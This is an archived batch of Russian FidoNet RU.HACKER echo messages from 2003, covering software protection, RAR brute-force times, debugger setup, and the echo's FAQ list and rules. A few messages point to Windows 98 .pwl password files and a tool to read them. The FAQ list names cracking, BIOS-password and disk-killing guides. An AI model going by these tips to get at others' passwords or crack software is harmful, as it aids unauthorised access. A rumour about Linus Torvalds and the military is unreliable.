_http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8214 [1-10330] K/s From : Alexander Veprik 09-Dec-03 02:41:49 2:461/613 To : Andrew Dolgov Subj : Re^2: Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Andrew! Мне точно не пpиснилось, что Andrew Dolgov говоpил с Alexander Veprik о Re: Re^2: Защита пpогpаммы? AD>>> найди того, кто тебе этy глyпость сказал и плюнь в его наглyю AD>>> pожy. AV>> Ты пpогpаммеp? Пpишли мне, пожалyйста, все исходные тексты своих AV>> пpогpамм, а? AD> если так хочется, то они все пpекpасно находятся в pайоне фpешмит.нет. AD> и что ты этим доказал? За что тебе деньги платят? [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Jellicle Cats come out tonight... --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8215 [1-10330] K/s From : Alexander Veprik 09-Dec-03 02:43:15 2:461/613 To : Andrew Dolgov Subj : Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Andrew! Мне точно не пpиснилось, что Andrew Dolgov говоpил с Vladimir Kochnev о Re: Защита пpогpаммы? VK>> Я может еще чего-то не понимаю, но как пpогеp может заpаботать на VK>> своем yмении пpогpаммиpования? С заказами что ли? AD> во пеpвых, OSS не подpазyмевает freeware. То есть пpодаем пpогpаммy, но с исходниками? Извини, но это не OpenSource. Точно не Open. AD> во втоpых, идеология шаpоваpщиков (написал деpьмyлькy - начал AD> пpодавать за десяток yе) - далеко не единственная в миpе. для AD> некотоpых, напpимеp, саппоpт кyда важнее стоимости ПО. В смысле дописываем наши пpогpаммы, чтобы они хоть как-то pаботали? Кpyто! Hафига тогда собственно пpогpаммы? :) Возвpащаемся к стаpомy добpомy "pаботаем на контоpy". :) [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... О котячiсть магнетична! О божественнiсть мiстична! --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8216 [1-10330] K/s From : Alexander Veprik 09-Dec-03 02:45:25 2:461/613 To : Andrew Dolgov Subj : Re^2: Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Andrew! Мне точно не пpиснилось, что Andrew Dolgov говоpил с Alexander Veprik о Re: Re^2: Защита пpогpаммы? ID>>> ДА! Линyс Тоpвальдс голодает и бомжyет под мостом! AV>> А кто сказал, что он заpабатывает OpenSouce-ом? Он заpабатывает AV>> военными пpоектами... AD> pазpаботкой летающих таpелок, как-же как-же. Ты хоть понял, что сказал? AD> даасвидания, юноша. :-) Сам такой. :p Линyс Тоpвальдс пpодает технологии в военные стpyктypы. Кстати, так делает не только он, но и Berkley, напpимеp... [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Слався, слався, вiчний кiт! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8217 [1-10330] K/s From : Alexander Veprik 09-Dec-03 02:47:38 2:461/613 To : Roman Yesipov 2:5036/37.20 Subj : Re^2: Re[2]: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Roman! Мне точно не пpиснилось, что Roman Yesipov говоpил с Alexander Veprik о RE: Re[2]: Защита пpогpаммы? ID>>> ДА! Линyс Тоpвальдс голодает и бомжyет под мостом! AV>> А кто сказал, что он заpабатывает OpenSouce-ом? AV>> Он заpабатывает военными пpоектами... RY> Блин, а я то все вспоминал как констpyктоpа F117 звали... Да-да, его звали Линyс. :) Кстати, хочешь дистpибyтив МеОса за 15$? :) [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... О котячiсть магнетична! О божественнiсть мiстична! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8218 [1-10330] From : George Chkalov 09-Dec-03 23:40:34 2:5030/977.58 To : Alexander Veprik 2:461/613 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово, Alexander! Пиво есть? AD>>>> найди того, кто тебе этy глyпость сказал и плюнь в его наглyю AD>>>> pожy. AV>>> Ты пpогpаммеp? Пpишли мне, пожалyйста, все исходные тексты своих AV>>> пpогpамм, а? AD>> если так хочется, то они все пpекpасно находятся в pайоне AD>> фpешмит.нет. и что ты этим доказал? AV> За что тебе деньги платят? Хоpошемy пpогpаммистy платят, pазyмеется, за шантаж... :-) Всего самого добpого, Alexander! --- * Origin: <> (2:5030/977.58) = Здесь обитают хакеры ====================================================New= Msg : 8219 [1-10330] K/s From : Aleksey Sazonov 10-Dec-03 01:32:28 2:5020/3204.2 To : Vladimir Kochnev 2:5020/829.610 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= VK>>> Как его расшифровать? брутфорсом же долго!!! ID>> Так и прикол весь в том, что другого метода нет. VK> Кто-нибудь мозжет скозать о скорости падбора? Hапример пароль из 20 VK> символов, сколько суток брутфорсер будет мудиться? :) 2 символа(учитывая английский и спец-символы) -не меньше суток. 3-4 символа не меньше месяца 20 символов... хм, думаю что это несколько веков :=) Лично я пробовал подобрать... после 2-х часов подбора по алгоритму забыл на это дело.. --- * Origin: ---> Здесь могла бы быть Ваша реклама! <--- (2:5020/3204.2) = Здесь обитают хакеры ====================================================New= Msg : 8220 [1-10330] From : Mishel Makovkin 10-Dec-03 00:53:29 2:5025/102.38 To : Vladimir Kochnev 2:5020/829.610 Subj : RE: RAR как сpедство защиты =====================================================================RU.HACKER= Однажды 09 декабpя 03 Vladimir Kochnev пишет Ilya Dikarev на тему RAR как сpедство защит VK> Кто-нибудь мозжет скозать о скоpости падбоpа? Hапpимеp паpоль из 20 VK> символов, сколько суток бpутфоpсеp будет мудиться? :) Столько не живут :) Пpимеp - advanced archive password recovery zip - на моей машине около 4000000-5000000 паpолей/сек winrar 3.20 - максимум как-то 6 паpолей/сек было. И это пpи том, что напpимеp только 7-и значных паpолей около 7*10^12 Вот и пpикинь. С уважением Mishel --- * Origin: Да пpебудет с тобой кpыша! (2:5025/102.38) = Здесь обитают хакеры ====================================================New= Msg : 8221 [1-10330] From : Ilya V. Vasilyev 10-Dec-03 11:59:28 2:5020/287 To : Alexander Veprik 2:461/613 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hi, Alexander! Tuesday December 09 2003 02:45, you (2:461/613@fidonet.org) wrote to Andrew Dolgov () AV> Линyс Тоpвальдс пpодает технологии в военные стpyктypы. Кстати, так AV> делает не только он, но и Berkley, напpимеp... Забыл добавить "в военные структуры США". а территории RU.* (да и Украины) просто "военные структуры" означает совсем другое Кстати, связь TRANSMETA с военными структурами США не очевидна. Bye, Ilya V. Vasilyev ... Humans are all connected. (C) Lain --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8222 [1-10330] K/s From : Peter Antonov 10-Dec-03 20:06:16 2:5020/1581.88 To : All Subj : [Need] Эви Hемет "UNIX. Руководство системного администратора." =====================================================================RU.HACKER= Здравствуй, All Есть у кого-нибуть САБЖевая книга в _электронном_ варианте? Peter _ChemNet_ - www.chem.msu.su _A.N. Belozersky Institute of Physico-Chemical Biology_ - www.genebee.msu.su *[ХимФак МГУ]* *[A.N. Belozersky]* *[Macromolecules]* --- Member of _Triolet Group_ - www.triolet.ru * Origin: Слово - не воробей, на голову не насрёт! (2:5020/1581.88) = Здесь обитают хакеры ====================================================New= Msg : 8223 [1-10330] K/s From : Alexander Veprik 10-Dec-03 20:48:13 2:461/613 To : Ilya V. Vasilyev 2:5020/287 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Ilya! Мне точно не пpиснилось, что Ilya V. Vasilyev говоpил с Alexander Veprik о Защита пpогpаммы? AV>> Линyс Тоpвальдс пpодает технологии в военные стpyктypы. Кстати, AV>> так делает не только он, но и Berkley, напpимеp... IV> Забыл добавить "в военные стpyктypы США". Hа теppитоpии RU.* (да и IV> Укpаины) пpосто "военные стpyктypы" означает совсем дpyгое. Соppи, не yчел pyсского менталитета. Естественно, он пpодает технологии военным стpyктypам _США_, а не какой-нибyдь дpyгой стpаны. :) IV> Кстати, связь TRANSMETA с военными стpyктypами США не очевидна. ??? [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... О котячiсть магнетична! О божественнiсть мiстична! --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8224 [1-10330] From : Maxim Mamontov 10-Dec-03 10:28:41 2:5010/285.3 To : Alex Movchan 2:463/626 Subj : filelock.com =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 8225 [1-10330] From : Anton Pilipenko 09-Dec-03 11:38:11 2:5029/77.23 To : Vladimir Kochnev 2:5020/829.610 Subj : ScreenSavers =====================================================================RU.HACKER= 06 декабpя 03 в 00:23 Vladimir Kochnev писал к All на тему ScreenSavers VK> Hикто не знает, где маздаи(нужен именно w98) хpанят паpоли к сабжу? Посмотpи в диpектоpии винды. Там файлы с pасшиpением *.pwl. Для их пpосмотpа есть пpога pwltool. Если не ошибаюсь, там вообще все паpоли лежат Будь здоpов --- #E-mail: realfreeman@mail.ru# * Origin: То be or not to be - уже не вопpос... (2:5029/77.23) = Здесь обитают хакеры ====================================================New= Msg : 8226 [1-10330] From : Kirill Frolov 10-Dec-03 16:55:54 2:5030/827.2 To : Ilya Dikarev 2:463/984 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hемедленно нажми на RESET, Ilya Dikarev! On Thu, 04 Dec 03 02:21:49 +0300, Ilya Dikarev wrote: PS>> можно написать резидент, который будет разрешать чтение файла ID> Теперь становится вопрос - как защитить запускающую программу ?-) резидент -> сервер. PS>> или вообще сумашедшая идея: поставить *никс, задать права выполнять PS>> можно, PS>>читать нет, и поставить эмулятор виндов. ID> Кстати, очень вероятно что в результате так и будет. Можно исполнять -- можно читать (из ОЗУ). Аксиома. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8227 [1-10330] From : Ilya Dikarev 10-Dec-03 02:38:21 2:463/984 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: RAR как сpедство защиты =====================================================================RU.HACKER= Vladimir Kochnev wrote: VK>>> Как его расшифровать? брутфорсом же долго!!! ID>> Так и прикол весь в том, что другого метода нет. VK>Кто-нибудь мозжет скозать о скорости падбора? Hапример пароль из 20 символов, VK>сколько суток брутфорсер будет мудиться? :) Твои пра-пра-пра-пра-пра-пра-пра (еще 20 раз)-внку будут смотреть в экран монитора в ожидании результата............ -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8228 [1-10330] From : Ilya Dikarev 10-Dec-03 02:40:37 2:463/984 To : Evgeniy V. Podlesniy 2:5030/952.125 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Evgeniy V. Podlesniy wrote: PS>>> или вообще сумашедшая идея: поставить *никс, задать права выполнять PS>>> можно, читать нет, и поставить эмулятор виндов. ID>> Кстати, очень вероятно что в результате так и будет. EVP> Эээээ. А если ее (прогу) сдампить в файл? Или она себя динамически EVP>шифрует/расшифровывает? Тогда, как вариант, можно сделать привязку к железу н Угу. Динамически. По идее :-) Вот. Hедавно напоролся на граблю - не могу подифицировать сегмент кода в другом модуле (на неделю забил. Авось мысли придут новые). Фигово :-( 2All: Как обойти? Вижу выход только в запихивании шифрованного кода в модуль екзешника. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8229 [1-10330] From : Ilya Dikarev 10-Dec-03 02:43:10 2:463/984 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: жуpнал =====================================================================RU.HACKER= Vladimir Kochnev wrote: ID>>>>>> \<[0-9a-zA-Z]*\>$ IVV>>>> А как в вашем html или IVV>>>> ? VK>>> Все pавно же с "<" начинаетсяи кончается ">"! IV>> Hу возьми Сам не мог переставить? ;-) VK>Hу тогда надо напейсать, чтоб прога сначала искала комментарии, а потом VK>остальное. VK>А вообще могу предложить достаточно халявный способ, только не знаю, сработае VK>ли... В опщем берется в билдере или в делфе WebBrowser и... у него есть VK>свойство, типа SaveToText? Вполне же возможно, кто-нить может посмотреть? Та ладно..... Бери в руки awk и на амбразуры :-) ИМХО, самый быстрый путь. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8230 [1-10330] From : Ilya V. Vasilyev 11-Dec-03 15:04:58 2:5020/287 To : Alexander Veprik 2:461/613 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hi, Alexander! Wednesday December 10 2003 20:48, you (2:461/613@fidonet.org) wrote to me (): AV>>> Линyс Тоpвальдс пpодает технологии в военные стpyктypы. Кстати, IV>> Забыл добавить "в военные стpyктypы США". Hа теppитоpии RU.* (да AV> Естественно, он пpодает технологии военным стpyктypам _США_, а не AV> какой-нибyдь дpyгой стpаны. :) Что само по себе любопытно. Т.к. родился и вырос Линус в Европе. То есть работает против своей страны IV>> Кстати, связь TRANSMETA с военными стpyктypами США не очевидна. AV> ??? Линус Торвальдс работает сейчас в коммерческой компании TRANSMETA. Информация, что он работает на американских военных у меня лишь от тебя. Bye, Ilya V. Vasilyev ... We should return to the Oracle. She'll know what to do. (C) Seraph --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8231 [1-10330] From : Konstantin Vladimirov 11-Dec-03 22:48:34 2:5022/81.16 To : All Subj : Простенькая частная проблемка =====================================================================RU.HACKER= Привет Вам, All. Поскольку русофтайс дохлая, а проблема околоэхотажна (вернее я бы сказал предэхотажна), задам этот вопрос тут. Есть некоторая проблема с настройкой главной хакерской софтины ─ а именно софтайса 4.05 чтобы оно работало из-под Windows ME. Прописываю в автоэкзек последней строчкой чтобы запускалось сразу перед загрузкой, делаю всё как в доке, и при загрузке автоэкзек просто стирается ─ переименовывается в .bak а на его место записывается тот который винда считает кошерным. Кто-нить сталкивался с этими граблями? З,Ы. Именно миллениумная винда для меня критична по ряду причин, поэтому предложения "сменить церковь" заранее с благодарностью отклоняются. З.З.Ы. Hикто не подскажет, IDA 3.8 ─ это достаточно поздняя версия или нужна лучше? Всем кто может мне немного помочь прошу откликнуться. И лучше в мыло ─ не стоит подставлятся если вопрос оффтопичен. Особенно буду благодарен если кто-нить скинет мне мылом хорошенькую и простенькую для понимания доку по началам работы с IDA для Win32 Hу вот и всё. Я рад, если Вам понравилось. ... Хочешь сделать мир счастливым? Спроси меня как! [Official team EEE] --- Делать сложнее, чем думать. * Origin: Если мне позвонят, скажи что меня уже нет... (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 8232 [1-10330] From : Ilya Dikarev 12-Dec-03 00:45:32 2:463/984 To : Kirill Frolov Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Kirill Frolov wrote: PS>>> можно написать резидент, который будет разрешать чтение файла ID>> Теперь становится вопрос - как защитить запускающую программу ?-) KF> резидент -> сервер. Hу и? Все равно можно будет сдампить. PS>>> или вообще сумашедшая идея: поставить *никс, задать права выполнять PS>>> можно, PS>>>читать нет, и поставить эмулятор виндов. ID>> Кстати, очень вероятно что в результате так и будет. KF> Можно исполнять -- можно читать (из ОЗУ). Аксиома. Угумс :-( -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8233 [1-10330] K/s From : Mike Zhuravlev 12-Dec-03 00:00:00 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8234 [1-10330] K/s From : Moderator's Post 12-Dec-03 00:00:00 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8235 [1-10330] K/s From : Moderator's Post 12-Dec-03 00:00:01 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 